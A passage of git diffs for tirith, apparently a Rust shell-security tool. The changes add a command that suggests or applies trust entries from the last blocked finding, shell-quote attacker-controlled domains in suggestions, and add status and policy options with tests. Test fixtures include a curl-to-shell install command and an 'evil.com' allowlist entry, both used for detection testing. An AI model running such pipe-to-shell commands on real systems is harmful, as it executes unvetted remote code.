+        .ok_or_else(|| "cannot determine data directory".to_string())?;
     let path = data_dir.join("last_trigger.json");
     if !path.exists() {
-        eprintln!("tirith: no recent trigger found");
-        return 1;
+        return Ok(None);
+    }
+    let content =
+        fs::read_to_string(&path).map_err(|e| format!("failed to read last trigger: {e}"))?;
+    let val: serde_json::Value =
+        serde_json::from_str(&content).map_err(|e| format!("failed to parse last trigger: {e}"))?;
+    Ok(Some(val))
+}
+
+/// Extract trust targets and rule IDs from a parsed `last_trigger.json`.
+///
+/// `targets` prefer a FULL URL when the finding evidence carries one (a `raw`
+/// string with a scheme that parses) so the suggested trust can be narrow; it
+/// falls back to a bare host/domain otherwise. Order and de-dup mirror the way
+/// `last()` walks findings (per-finding `raw` first, then `raw_host`).
+fn extract_targets_and_rules(val: &serde_json::Value) -> (Vec<String>, Vec<String>) {
+    let mut targets: Vec<String> = Vec::new();
+    let push = |t: String, targets: &mut Vec<String>| {
+        if !t.is_empty() && !targets.contains(&t) {
+            targets.push(t);
+        }
+    };
+    if let Some(findings) = val.get("findings").and_then(|v| v.as_array()) {
+        for finding in findings {
+            if let Some(evidence) = finding.get("evidence").and_then(|v| v.as_array()) {
+                for ev in evidence {
+                    if let Some(raw) = ev.get("raw").and_then(|v| v.as_str()) {
+                        // Prefer the full URL when `raw` is one; else fall back
+                        // to the bare host so we still have something to trust.
+                        if raw.contains("://") && url::Url::parse(raw).is_ok() {
+                            push(raw.to_string(), &mut targets);
+                        } else if let Some(host) = extract_host(raw) {
+                            push(host, &mut targets);
+                        }
+                    }
+                    if let Some(host) = ev.get("raw_host").and_then(|v| v.as_str()) {
+                        push(host.to_string(), &mut targets);
+                    }
+                }
+            }
+        }
     }
 
-    let content = match fs::read_to_string(&path) {
-        Ok(c) => c,
+    let rule_ids: Vec<String> = val
+        .get("rule_ids")
+        .and_then(|v| v.as_array())
+        .map(|arr| {
+            arr.iter()
+                .filter_map(|v| v.as_str().map(String::from))
+                .collect()
+        })
+        .unwrap_or_default();
+
+    (targets, rule_ids)
+}
+
+/// Read + parse + extract in one step: `(targets, rule_ids)`.
+///
+/// `targets` prefer full URLs, else bare domains (see `extract_targets_and_rules`).
+/// `Err` covers both "no recent trigger" (so callers can print a friendly note)
+/// and real read/parse failures.
+fn read_last_trigger() -> Result<(Vec<String>, Vec<String>), String> {
+    match load_last_trigger_value()? {
+        Some(val) => Ok(extract_targets_and_rules(&val)),
+        None => Err("no recent trigger found".into()),
+    }
+}
+
+/// Build the ready-to-run `tirith trust add` suggestion lines for each
+/// (target, rule_id) pair. A full-URL target is narrow, so it is suggested
+/// without `--broad`; a bare domain needs `--broad` because `trust add` rejects
+/// broad scopes without the opt-in (see `add()` / `classify_scope`).
+fn suggestion_lines(targets: &[String], rule_ids: &[String]) -> Vec<String> {
+    let mut lines = Vec::new();
+    for target in targets {
+        // A target that classifies as broad (bare domain/wildcard/TLD) needs
+        // `--broad`; a full URL (or any narrow pattern) does not.
+        let needs_broad = classify_scope(target).is_broad();
+        if rule_ids.is_empty() {
+            lines.push(format_add_line(target, None, needs_broad));
+        } else {
+            for rid in rule_ids {
+                lines.push(format_add_line(target, Some(rid), needs_broad));
+            }
+        }
+    }
+    lines
+}
+
+fn format_add_line(target: &str, rule_id: Option<&str>, needs_broad: bool) -> String {
+    let broad = if needs_broad { " --broad" } else { "" };
+    match rule_id {
+        Some(rid) => format!("tirith trust add {target}{broad} --rule {rid} --ttl 30d"),
+        None => format!("tirith trust add {target}{broad} --ttl 30d"),
+    }
+}
+
+/// `tirith trust from-last-trigger [--apply]` -- turn the most recent trigger
+/// into trust commands. Default (suggest) prints ready-to-run `trust add`
+/// lines so the operator can copy/paste the narrowest one; `--apply` runs them.
+///
+/// Print-only by default mirrors the codebase's `policy tune` stance: suggest,
+/// don't mutate.
+pub fn from_last_trigger(apply: bool) -> i32 {
+    let (targets, rule_ids) = match read_last_trigger() {
+        Ok(v) => v,
+        // A missing/empty trigger is not an error for this command -- it is the
+        // common "nothing happened yet" case, so exit 0 with a friendly note.
+        Err(e) if e == "no recent trigger found" => {
+            eprintln!("tirith: no recent trigger to trust");
+            return 0;
+        }
         Err(e) => {
-            eprintln!("tirith: failed to read last trigger: {e}");
+            eprintln!("tirith: trust from-last-trigger: {e}");
             return 1;
         }
     };
 
-    let val: serde_json::Value = match serde_json::from_str(&content) {
-        Ok(v) => v,
+    if targets.is_empty() {
+        eprintln!("tirith: no recent trigger to trust");
+        return 0;
+    }
+
+    if !apply {
+        eprintln!("Suggested trust commands (run the narrowest one that fits):");
+        eprintln!();
+        for line in suggestion_lines(&targets, &rule_ids) {
+            println!("{line}");
+        }
+        eprintln!();
+        eprintln!("Re-run with --apply to add these automatically.");
+        return 0;
+    }
+
+    // --apply: actually add each entry. A bare-domain target is broad, so pass
+    // `broad = true`; a full-URL (narrow) target does not need it.
+    let mut added = 0;
+    for target in &targets {
+        let broad = classify_scope(target).is_broad();
+        if rule_ids.is_empty() {
+            if add(target, None, None, false, broad, None, "user", false) == 0 {
+                added += 1;
+            }
+        } else {
+            for rid in &rule_ids {
+                if add(target, Some(rid), None, false, broad, None, "user", false) == 0 {
+                    added += 1;
+                }
+            }
+        }
+    }
+
+    eprintln!("tirith: added {added} trust entry/entries from last trigger");
+    0
+}
+
+/// `tirith trust last` -- show last trigger and offer to trust.
+pub fn last() -> i32 {
+    let val = match load_last_trigger_value() {
+        Ok(Some(v)) => v,
+        Ok(None) => {
+            eprintln!("tirith: no recent trigger found");
+            return 1;
+        }
         Err(e) => {
-            eprintln!("tirith: failed to parse last trigger: {e}");
+            eprintln!("tirith: {e}");
             return 1;
         }
     };
@@ -1984,5 +2133,125 @@ mod tests {
         let removed: Vec<_> = base.difference(&cur).collect();
         assert_eq!(added, vec![&"C"]);
         assert_eq!(removed, vec![&"A"]);
+    }
+
+    /// Plant a `last_trigger.json` under a temp data dir and run `f` with
+    /// `data_dir()` pointed at it. Holds `ENV_LOCK` (process-global env mutation)
+    /// and restores `XDG_DATA_HOME` / `APPDATA` on Drop. `data_dir()` honors
+    /// `XDG_DATA_HOME` on Unix but `%APPDATA%` on Windows (etcetera), so set both.
+    fn with_seeded_last_trigger<F: FnOnce()>(json: &str, f: F) {
+        use crate::cli::test_harness::{EnvGuard, ENV_LOCK};
+        let _lock = ENV_LOCK.lock().unwrap_or_else(|e| e.into_inner());
+
+        let dir = tempfile::tempdir().expect("tempdir");
+        let _xdg = EnvGuard::set("XDG_DATA_HOME", dir.path());
+        let _appdata = EnvGuard::set("APPDATA", dir.path());
+
+        let tirith_data = dir.path().join("tirith");
+        fs::create_dir_all(&tirith_data).expect("create data dir");
+        fs::write(tirith_data.join("last_trigger.json"), json).expect("write last_trigger.json");
+
+        f();
+    }
+
+    /// Same env isolation, but plant NO `last_trigger.json` (empty data dir).
+    fn with_empty_data_dir<F: FnOnce()>(f: F) {
+        use crate::cli::test_harness::{EnvGuard, ENV_LOCK};
+        let _lock = ENV_LOCK.lock().unwrap_or_else(|e| e.into_inner());
+
+        let dir = tempfile::tempdir().expect("tempdir");
+        let _xdg = EnvGuard::set("XDG_DATA_HOME", dir.path());
+        let _appdata = EnvGuard::set("APPDATA", dir.path());
+        f();
+    }
+
+    /// A full-URL evidence target is suggested NARROW: a copy/paste-ready
+    /// `tirith trust add <url> --rule <rule_id> --ttl 30d` line with NO `--broad`.
+    #[test]
+    fn from_last_trigger_suggests_narrow_url_without_broad() {
+        let json = r#"{
+            "rule_ids": ["shortened_url"],
+            "severity": "high",
+            "command_redacted": "curl https://example.com/install.sh | sh",
+            "timestamp": "2026-06-10T00:00:00Z",
+            "findings": [
+                {
+                    "title": "Shortened URL",
+                    "evidence": [
+                        { "raw": "https://example.com/install.sh" }
+                    ]
+                }
+            ]
+        }"#;
+
+        with_seeded_last_trigger(json, || {
+            // read_last_trigger prefers the FULL URL as the target.
+            let (targets, rule_ids) = read_last_trigger().expect("read_last_trigger");
+            assert_eq!(targets, vec!["https://example.com/install.sh".to_string()]);
+            assert_eq!(rule_ids, vec!["shortened_url".to_string()]);
+
+            // The suggested line is the narrow, no-`--broad` form.
+            let lines = suggestion_lines(&targets, &rule_ids);
+            let expected =
+                "tirith trust add https://example.com/install.sh --rule shortened_url --ttl 30d";
+            assert!(
+                lines.iter().any(|l| l == expected),
+                "expected narrow URL suggestion {expected:?}, got: {lines:?}"
+            );
+            assert!(
+                lines.iter().all(|l| !l.contains("--broad")),
+                "a full-URL target must NOT be suggested with --broad: {lines:?}"
+            );
+
+            // The real entry point runs clean in suggest (print-only) mode.
+            assert_eq!(from_last_trigger(false), 0);
+        });
+    }
+
+    /// A bare-domain target (only `raw_host`, no URL) needs `--broad` because
+    /// `trust add` rejects broad scopes without the opt-in.
+    #[test]
+    fn from_last_trigger_bare_domain_gets_broad() {
+        let json = r#"{
+            "rule_ids": ["homograph"],
+            "findings": [
+                { "title": "Homograph", "evidence": [ { "raw_host": "example.com" } ] }
+            ]
+        }"#;
+
+        with_seeded_last_trigger(json, || {
+            let (targets, rule_ids) = read_last_trigger().expect("read_last_trigger");
+            assert_eq!(targets, vec!["example.com".to_string()]);
+
+            let lines = suggestion_lines(&targets, &rule_ids);
+            let expected = "tirith trust add example.com --broad --rule homograph --ttl 30d";
+            assert!(
+                lines.iter().any(|l| l == expected),
+                "expected bare-domain suggestion with --broad {expected:?}, got: {lines:?}"
+            );
+        });
+    }
+
+    /// A missing/empty trigger is the common "nothing happened yet" case:
+    /// `from_last_trigger` returns 0 (friendly note), not an error.
+    #[test]
+    fn from_last_trigger_missing_returns_zero() {
+        with_empty_data_dir(|| {
+            assert_eq!(from_last_trigger(false), 0);
+            // read_last_trigger surfaces the no-trigger sentinel for callers.
+            assert_eq!(
+                read_last_trigger().unwrap_err(),
+                "no recent trigger found".to_string()
+            );
+        });
+    }
+
+    /// The refactor must keep `last()` behavior identical: with no trigger on
+    /// disk it still returns 1 (its non-interactive, stdin-free path).
+    #[test]
+    fn last_unchanged_without_trigger_returns_one() {
+        with_empty_data_dir(|| {
+            assert_eq!(last(), 1);
+        });
     }
 }

--- a/crates/tirith/src/cli/warnings.rs
+++ b/crates/tirith/src/cli/warnings.rs
@@ -239,8 +239,14 @@ fn print_table(w: &SessionWarnings, top_rules: &[(String, u32)], paranoia: u8) {
     let suggestion_threshold = 3;
     for (rule, count) in top_rules {
         if *count >= suggestion_threshold {
-            let domain = find_domain_for_rule(w, rule);
-            if let Some(d) = domain {
+            // Shell-quote the domain: it derives from analyzed (attacker-
+            // controlled) command text and this line is copy-paste-ready, so an
+            // unquoted `$(...)` / backtick / `;` would execute on paste (same class
+            // as the block "To allow" line). A target that cannot be safely quoted
+            // falls back to the `<pattern>` placeholder, never a runnable line.
+            let quoted = find_domain_for_rule(w, rule)
+                .and_then(tirith_core::safe_command::shell_single_quote);
+            if let Some(d) = quoted {
                 println!(
                     "\nSuggestion: {rule} fired {count} times. Consider: tirith trust add {d} --rule {rule}"
                 );

--- a/crates/tirith/src/cli/warnings.rs
+++ b/crates/tirith/src/cli/warnings.rs
@@ -239,20 +239,24 @@ fn print_table(w: &SessionWarnings, top_rules: &[(String, u32)], paranoia: u8) {
     let suggestion_threshold = 3;
     for (rule, count) in top_rules {
         if *count >= suggestion_threshold {
-            // Shell-quote the domain: it derives from analyzed (attacker-
-            // controlled) command text and this line is copy-paste-ready, so an
-            // unquoted `$(...)` / backtick / `;` would execute on paste (same class
-            // as the block "To allow" line). A target that cannot be safely quoted
-            // falls back to the `<pattern>` placeholder, never a runnable line.
-            let quoted = find_domain_for_rule(w, rule)
-                .and_then(tirith_core::safe_command::shell_single_quote);
+            // The domain comes from analyzed (attacker-controlled) command text and this
+            // line is copy-paste-ready. Scrub terminal-control bytes (ANSI/OSC/zero-width)
+            // first so the target cannot repaint the terminal, then shell-single-quote so
+            // `$(...)`/backtick/`;`/space can't execute on paste. find_domain_for_rule yields
+            // a BARE domain, which `trust add` classifies as broad and rejects without
+            // --broad, so emit --broad to keep the line runnable. An unquotable target falls
+            // back to the <pattern> placeholder.
+            let quoted = find_domain_for_rule(w, rule).and_then(|d| {
+                let scrubbed = tirith_core::mcp::output_filter::sanitize_text_str(d);
+                tirith_core::safe_command::shell_single_quote(&scrubbed)
+            });
             if let Some(d) = quoted {
                 println!(
-                    "\nSuggestion: {rule} fired {count} times. Consider: tirith trust add {d} --rule {rule}"
+                    "\nSuggestion: {rule} fired {count} times. Consider: tirith trust add {d} --broad --rule {rule}"
                 );
             } else {
                 println!(
-                    "\nSuggestion: {rule} fired {count} times. Consider: tirith trust add <pattern> --rule {rule}"
+                    "\nSuggestion: {rule} fired {count} times. Consider: tirith trust add <pattern> --broad --rule {rule}"
                 );
             }
         }

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -7951,8 +7951,13 @@ mod help_category_tests {
                     if name == "help" {
                         continue; // clap's auto-generated built-in
                     }
+                    // Token-level match (not substring): a command name must appear
+                    // as a whole whitespace-delimited token, so e.g. `run` can't
+                    // false-pass by being a substring of `temp-run`.
                     assert!(
-                        COMMANDS_BY_CATEGORY.contains(name),
+                        COMMANDS_BY_CATEGORY
+                            .split_whitespace()
+                            .any(|tok| tok == name),
                         "command `{name}` is missing from COMMANDS_BY_CATEGORY — add it to a category"
                     );
                 }

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -640,8 +640,9 @@ Output forms:
 Examples:
   tirith prompt-status --short
   tirith prompt-status --json
-  PS1='$(tirith prompt-status --short) '\"$PS1\"          # bash
-  PROMPT='$(tirith prompt-status --short) '\"$PROMPT\"     # zsh (after setopt PROMPT_SUBST)
+  PS1='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PS1\"        # bash
+  PROMPT='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PROMPT\"  # zsh (after setopt PROMPT_SUBST)
+  # The TIRITH_STATUS= prefix forwards the hook's non-exported status var to the child.
 
 Cache:
   $XDG_RUNTIME_DIR/tirith/prompt-<uid>.cache (30s TTL).
@@ -661,7 +662,9 @@ Cache:
 
     /// Show whether tirith is actively protecting this shell: protection mode,
     /// hook health, active policy + scope, and threat-DB freshness. Exits NON-ZERO
-    /// unless protection is actively blocking — use it in CI or a prompt guard.
+    /// when protection is provably reduced (warn-only, degraded, or no hook); exits
+    /// 0 when actively blocking, or when a configured hook's live mode is not
+    /// visible to an external check (run `tirith doctor` in your shell to confirm).
     Status {
         /// Output as JSON.
         #[arg(long)]

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -6,13 +6,35 @@ use std::path::PathBuf;
 use crate::cli::{HumanJsonFormat, HumanJsonSarifFormat};
 use clap::{Parser, Subcommand};
 
+/// A categorized command overview appended to `tirith --help` (the long help),
+/// since clap-derive cannot group subcommands by category. The
+/// `every_command_is_categorized` test guards this against drift.
+const COMMANDS_BY_CATEGORY: &str = "\
+COMMANDS BY CATEGORY:
+  Scan & Analyze:   check paste run score diff fetch fix scan view preview watch temp-run taint intend lab explain why visual-audit
+  Status & Health:  status doctor prompt-status dashboard warnings receipt logs baseline
+  Setup & Onboard:  init onboard setup install activate update version verify-self browser devcontainer codespaces
+  Policy & Trust:   policy trust rule output
+  Shell & System:   daemon hooks exec env path sudo ssh context persistence hygiene aliases
+  Supply-chain:     package ecosystem threat-db iac canary secret command-card commands
+  Integrations:     mcp mcp-server gateway agent ai lsp license
+  Forensics:        audit incident checkpoint share redact clipboard
+
+Run `tirith <command> --help` for details on any command.";
+
 #[derive(Parser)]
 #[command(
     name = "tirith",
     version,
-    about = "URL security analysis for shell environments"
+    about = "URL security analysis for shell environments",
+    after_long_help = COMMANDS_BY_CATEGORY
 )]
 pub struct Cli {
+    /// Suppress low-value advisory output (clean "no issues" lines, shadow-binary
+    /// warnings, tips). Never hides errors, verdicts, JSON, or security notices.
+    #[arg(long, global = true)]
+    quiet: bool,
+
     #[command(subcommand)]
     command: Commands,
 }
@@ -634,6 +656,15 @@ Cache:
         format: Option<HumanJsonFormat>,
         /// Alias for --format json
         #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+    },
+
+    /// Show whether tirith is actively protecting this shell: protection mode,
+    /// hook health, active policy + scope, and threat-DB freshness. Exits NON-ZERO
+    /// unless protection is actively blocking — use it in CI or a prompt guard.
+    Status {
+        /// Output as JSON.
+        #[arg(long)]
         json: bool,
     },
 
@@ -5179,11 +5210,31 @@ Templates:
     #[command(after_help = "\
 Examples:
   tirith policy validate
+  tirith policy validate ./policy.yaml
   tirith policy validate --format json")]
     Validate {
+        /// Policy file to validate, as a positional arg (default: auto-discover).
+        /// Conflicts with --path.
+        #[arg(value_name = "PATH", conflicts_with = "path")]
+        path_pos: Option<String>,
         /// Path to policy file (default: auto-discover)
         #[arg(long)]
         path: Option<String>,
+        /// Output format (default: human)
+        #[arg(long, value_enum)]
+        format: Option<HumanJsonFormat>,
+        /// Alias for --format json
+        #[arg(long, hide = true, conflicts_with = "format")]
+        json: bool,
+    },
+    /// Show the fully-resolved effective policy for the current directory: source
+    /// path, scope, and (for a repo-scoped policy) which weakening fields were
+    /// neutralized. Local discovery only — never a network fetch.
+    #[command(after_help = "\
+Examples:
+  tirith policy effective
+  tirith policy effective --format json")]
+    Effective {
         /// Output format (default: human)
         #[arg(long, value_enum)]
         format: Option<HumanJsonFormat>,
@@ -5422,6 +5473,17 @@ Examples:
 Examples:
   tirith trust last")]
     Last,
+    /// Print ready-to-run `trust add` commands for the most recent blocked finding
+    /// (from the last-trigger record). Suggest-only by default; --apply runs them.
+    #[command(after_help = "\
+Examples:
+  tirith trust from-last-trigger
+  tirith trust from-last-trigger --apply")]
+    FromLastTrigger {
+        /// Add the trust entries instead of just printing the commands.
+        #[arg(long)]
+        apply: bool,
+    },
     /// Garbage-collect expired entries from trust stores
     #[command(after_help = "\
 Examples:
@@ -5490,11 +5552,17 @@ Examples:
 
 #[derive(Subcommand)]
 enum DaemonAction {
-    /// Start the daemon in the foreground
+    /// Start the daemon (foreground by default; --detach backgrounds it)
     #[command(after_help = "\
 Examples:
-  tirith daemon start")]
-    Start,
+  tirith daemon start            # foreground (blocks; run under a supervisor)
+  tirith daemon start --detach   # background; returns once the socket is up")]
+    Start {
+        /// Run in the background: re-spawn detached, verify the socket comes up,
+        /// then return. Default is foreground.
+        #[arg(long, short = 'd')]
+        detach: bool,
+    },
     /// Stop a running daemon
     #[command(after_help = "\
 Examples:
@@ -6308,10 +6376,11 @@ fn run() {
     }
 
     let cli = Cli::parse();
+    cli::init_quiet(cli.quiet);
 
     let exit_code = match cli.command {
         Commands::Daemon { action } => match action {
-            DaemonAction::Start => cli::daemon::start(),
+            DaemonAction::Start { detach } => cli::daemon::start(detach),
             DaemonAction::Stop => cli::daemon::stop(),
             DaemonAction::Status => cli::daemon::status(),
         },
@@ -6636,9 +6705,18 @@ fn run() {
                 minimal,
                 template,
             } => cli::policy::init(force, minimal, template.as_deref()),
-            PolicyAction::Validate { path, format, json } => {
+            PolicyAction::Validate {
+                path_pos,
+                path,
+                format,
+                json,
+            } => {
                 let (_, json) = HumanJsonFormat::resolve(format, json);
-                cli::policy::validate(path.as_deref(), json)
+                cli::policy::validate(path_pos.or(path).as_deref(), json)
+            }
+            PolicyAction::Effective { format, json } => {
+                let (_, json) = HumanJsonFormat::resolve(format, json);
+                cli::policy::effective(json)
             }
             PolicyAction::Test {
                 command,
@@ -6867,6 +6945,7 @@ fn run() {
                 scope,
             } => cli::trust::remove(&pattern, rule.as_deref(), &scope),
             TrustAction::Last => cli::trust::last(),
+            TrustAction::FromLastTrigger { apply } => cli::trust::from_last_trigger(apply),
             TrustAction::Gc {
                 expired,
                 scope,
@@ -6933,6 +7012,8 @@ fn run() {
             let (_, json) = HumanJsonFormat::resolve(format, json);
             cli::prompt_status::run(short, json)
         }
+
+        Commands::Status { json } => cli::status::run(json),
 
         Commands::Warnings {
             clear,
@@ -7840,4 +7921,40 @@ fn run() {
     };
 
     std::process::exit(exit_code);
+}
+
+#[cfg(test)]
+mod help_category_tests {
+    use super::{Cli, COMMANDS_BY_CATEGORY};
+    use clap::CommandFactory;
+
+    /// Every non-hidden top-level command must appear in the categorized help
+    /// block, so `tirith --help`'s overview never silently drifts from the real
+    /// command set when a new subcommand is added.
+    #[test]
+    fn every_command_is_categorized() {
+        // `Cli::command()` builds a very large command tree; the default ~2 MiB
+        // test-thread stack overflows in debug, so build it on a roomier stack.
+        std::thread::Builder::new()
+            .stack_size(16 * 1024 * 1024)
+            .spawn(|| {
+                let cmd = Cli::command();
+                for sub in cmd.get_subcommands() {
+                    if sub.is_hide_set() {
+                        continue;
+                    }
+                    let name = sub.get_name();
+                    if name == "help" {
+                        continue; // clap's auto-generated built-in
+                    }
+                    assert!(
+                        COMMANDS_BY_CATEGORY.contains(name),
+                        "command `{name}` is missing from COMMANDS_BY_CATEGORY — add it to a category"
+                    );
+                }
+            })
+            .unwrap()
+            .join()
+            .unwrap();
+    }
 }

--- a/crates/tirith/src/main.rs
+++ b/crates/tirith/src/main.rs
@@ -640,9 +640,10 @@ Output forms:
 Examples:
   tirith prompt-status --short
   tirith prompt-status --json
-  PS1='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PS1\"        # bash
-  PROMPT='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PROMPT\"  # zsh (after setopt PROMPT_SUBST)
-  # The TIRITH_STATUS= prefix forwards the hook's non-exported status var to the child.
+  PS1='$(TIRITH_STATUS=\"${TIRITH_STATUS:-}\" tirith prompt-status --short) '\"$PS1\"        # bash
+  PROMPT='$(TIRITH_STATUS=\"${TIRITH_STATUS:-}\" tirith prompt-status --short) '\"$PROMPT\"  # zsh (after setopt PROMPT_SUBST)
+  # The TIRITH_STATUS= prefix forwards the hook's non-exported status var to the child
+  # (the ${VAR:-} form stays safe under `set -u`).
 
 Cache:
   $XDG_RUNTIME_DIR/tirith/prompt-<uid>.cache (30s TTL).

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -8017,8 +8017,9 @@ fn init_prompt_status_emits_marker_wrapped_snippet_zsh() {
         "zsh snippet must set PROMPT_SUBST; got: {stdout}"
     );
     assert!(
-        stdout.contains("'$(tirith prompt-status --short) '"),
-        "zsh snippet must single-quote the command substitution; got: {stdout}"
+        stdout.contains("'$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '"),
+        "zsh snippet must single-quote the command substitution and forward the \
+         non-exported TIRITH_STATUS; got: {stdout}"
     );
 }
 
@@ -8061,7 +8062,8 @@ fn init_prompt_status_is_idempotent_when_run_twice() {
     );
 
     // The PS1 / PROMPT wrap-line must also appear exactly once.
-    let prompt_line = "PROMPT='$(tirith prompt-status --short) '\"$PROMPT\"";
+    let prompt_line =
+        "PROMPT='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PROMPT\"";
     assert_eq!(
         stdout_a.matches(prompt_line).count(),
         1,
@@ -8086,7 +8088,10 @@ fn init_without_prompt_status_does_not_emit_snippet() {
 #[test]
 fn init_prompt_status_supports_bash_and_fish_and_powershell() {
     for (shell, must_contain) in [
-        ("bash", "PS1='$(tirith prompt-status --short) '\"$PS1\""),
+        (
+            "bash",
+            "PS1='$(TIRITH_STATUS=\"$TIRITH_STATUS\" tirith prompt-status --short) '\"$PS1\"",
+        ),
         ("fish", "function fish_right_prompt"),
         ("powershell", "function global:prompt"),
     ] {
@@ -14469,6 +14474,40 @@ fn check_reads_command_from_piped_stdin() {
     assert!(
         err.contains("shortened_url") || err.contains("curl_pipe_shell"),
         "check must analyze a command piped on stdin; stderr: {err}"
+    );
+}
+
+#[test]
+fn check_rejects_oversized_piped_stdin() {
+    use std::io::Write as _;
+    use std::process::Stdio;
+    // Over-limit piped input (1 MiB + 1) must be REJECTED, never silently
+    // truncated to a clean verdict: a 1 MiB benign prefix could otherwise hide a
+    // `... | sh` tail and read as "no issues".
+    let mut child = tirith()
+        .args(["check", "--shell", "posix"])
+        .stdin(Stdio::piped())
+        .stdout(Stdio::piped())
+        .stderr(Stdio::piped())
+        .spawn()
+        .expect("spawn check");
+    {
+        let mut stdin = child.stdin.take().expect("stdin");
+        let blob = vec![b'a'; 1024 * 1024 + 1];
+        // The child may reject and exit before draining the whole blob, so a
+        // broken-pipe write error here is expected, not a test failure.
+        let _ = stdin.write_all(&blob);
+    }
+    let out = child.wait_with_output().expect("wait check");
+    assert_ne!(
+        out.status.code(),
+        Some(0),
+        "over-limit piped input must be rejected (fail closed), not analyzed as clean"
+    );
+    let err = String::from_utf8_lossy(&out.stderr);
+    assert!(
+        !err.contains("no issues"),
+        "must not print a clean verdict on truncated input; stderr: {err}"
     );
 }
 

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -2408,6 +2408,78 @@ severity_overrides:
     );
 }
 
+/// F9 SECURITY notice: when a repo-scoped `.tirith/policy.yaml` carries a WEAKENING field
+/// (here `allowlist`), it is neutralized and the operator is told once per session via an
+/// UNCONDITIONAL `eprintln!` in `warn_repo_policy_neutralized` — it must NOT route through
+/// `note()`/`--quiet`. A unique `XDG_STATE_HOME` keeps the per-session throttle marker fresh
+/// for each run (and off the real state dir).
+#[test]
+fn repo_policy_weakening_emits_neutralized_notice_even_when_quiet() {
+    let tmpdir = tempfile::tempdir().expect("tempdir");
+    let proj = tmpdir.path().join("project");
+    // Policy discovery walks up to `.git`, so seed one; the repo-scoped `allowlist` is a
+    // weakening field and gets dropped (and reported).
+    fs::create_dir_all(proj.join(".git")).unwrap();
+    fs::create_dir_all(proj.join(".tirith")).unwrap();
+    fs::write(
+        proj.join(".tirith").join("policy.yaml"),
+        "allowlist:\n  - evil.com\n",
+    )
+    .unwrap();
+
+    // Distinctive substrings from the real `warn_repo_policy_neutralized` message.
+    let assert_notice = |stderr: &str, ctx: &str| {
+        assert!(
+            stderr.contains("tightening-only") && stderr.contains("were ignored"),
+            "{ctx}: expected the repo-policy neutralization notice, got stderr:\n{stderr}"
+        );
+    };
+
+    // Run from the repo cwd so policy discovery loads `<proj>/.tirith/policy.yaml` as Repo
+    // scope. Clear `TIRITH_POLICY_ROOT` so an inherited value can't redirect discovery.
+    let out = tirith()
+        .current_dir(&proj)
+        .env_remove("TIRITH_POLICY_ROOT")
+        .env("XDG_STATE_HOME", tmpdir.path().join("state-normal"))
+        .args([
+            "check",
+            "--non-interactive",
+            "--no-daemon",
+            "--shell",
+            "posix",
+            "--",
+            "ls",
+        ])
+        .stderr(std::process::Stdio::piped())
+        .output()
+        .expect("failed to run tirith check");
+    assert_notice(&String::from_utf8_lossy(&out.stderr), "normal run");
+
+    // A `--quiet` run with a FRESH state dir (so the marker doesn't suppress it) STILL shows
+    // the notice — proving the security notice bypasses the quiet gate.
+    let out_quiet = tirith()
+        .current_dir(&proj)
+        .env_remove("TIRITH_POLICY_ROOT")
+        .env("XDG_STATE_HOME", tmpdir.path().join("state-quiet"))
+        .args([
+            "--quiet",
+            "check",
+            "--non-interactive",
+            "--no-daemon",
+            "--shell",
+            "posix",
+            "--",
+            "ls",
+        ])
+        .stderr(std::process::Stdio::piped())
+        .output()
+        .expect("failed to run tirith --quiet check");
+    assert_notice(
+        &String::from_utf8_lossy(&out_quiet.stderr),
+        "--quiet run (notice must bypass quiet)",
+    );
+}
+
 #[test]
 fn check_warn_only_block_renders_as_detected() {
     let out = tirith()

--- a/crates/tirith/tests/cli_integration.rs
+++ b/crates/tirith/tests/cli_integration.rs
@@ -14346,39 +14346,45 @@ fn lsp_stdio_initialize_didopen_didchange_lifecycle() {
 // ---------------------------------------------------------------------------
 
 #[test]
-fn status_exits_zero_when_guarded() {
+fn status_guarded_via_exported_signal_exits_zero() {
+    // The REAL hook contract: a protected shell's `TIRITH_STATUS` is NON-exported,
+    // so an external `tirith status` must read the EXPORTED
+    // `TIRITH_BASH_EFFECTIVE_PROTECTION` (which the bash hook re-exports precisely
+    // so an external check sees the truth). Prove it by setting ONLY the exported
+    // signal and clearing TIRITH_STATUS — a real protected shell never exports it.
     let out = tirith()
-        .env("TIRITH_STATUS", "blocks")
+        .env_remove("TIRITH_STATUS")
+        .env("TIRITH_BASH_EFFECTIVE_PROTECTION", "blocks")
         .args(["status"])
         .output()
         .expect("run status");
-    assert_eq!(out.status.code(), Some(0), "guarded protection must exit 0");
+    assert_eq!(
+        out.status.code(),
+        Some(0),
+        "a guarded shell (via the exported signal, not TIRITH_STATUS) must exit 0; stderr: {}",
+        String::from_utf8_lossy(&out.stderr)
+    );
 }
 
 #[test]
-fn status_exits_nonzero_when_not_guarded() {
-    for mode in ["warn-only", "off"] {
+fn status_warn_only_and_degraded_exit_nonzero() {
+    // Provably-reduced postures fail regardless of hook_configured. (The "off" /
+    // unset cases depend on the runner's shell profile and are covered
+    // deterministically by the `protection_health_classify_and_exit_codes` unit
+    // test instead.)
+    for mode in ["warn-only", "degraded"] {
         let out = tirith()
-            .env("TIRITH_STATUS", mode)
+            .env_remove("TIRITH_STATUS")
+            .env("TIRITH_BASH_EFFECTIVE_PROTECTION", mode)
             .args(["status"])
             .output()
             .expect("run status");
         assert_ne!(
             out.status.code(),
             Some(0),
-            "non-guarded protection ({mode}) must exit non-zero"
+            "{mode} protection must exit non-zero"
         );
     }
-    let out = tirith()
-        .env_remove("TIRITH_STATUS")
-        .args(["status"])
-        .output()
-        .expect("run status");
-    assert_ne!(
-        out.status.code(),
-        Some(0),
-        "unset TIRITH_STATUS must exit non-zero"
-    );
 }
 
 #[test]

--- a/crates/tirith/tests/cli_integration.rs
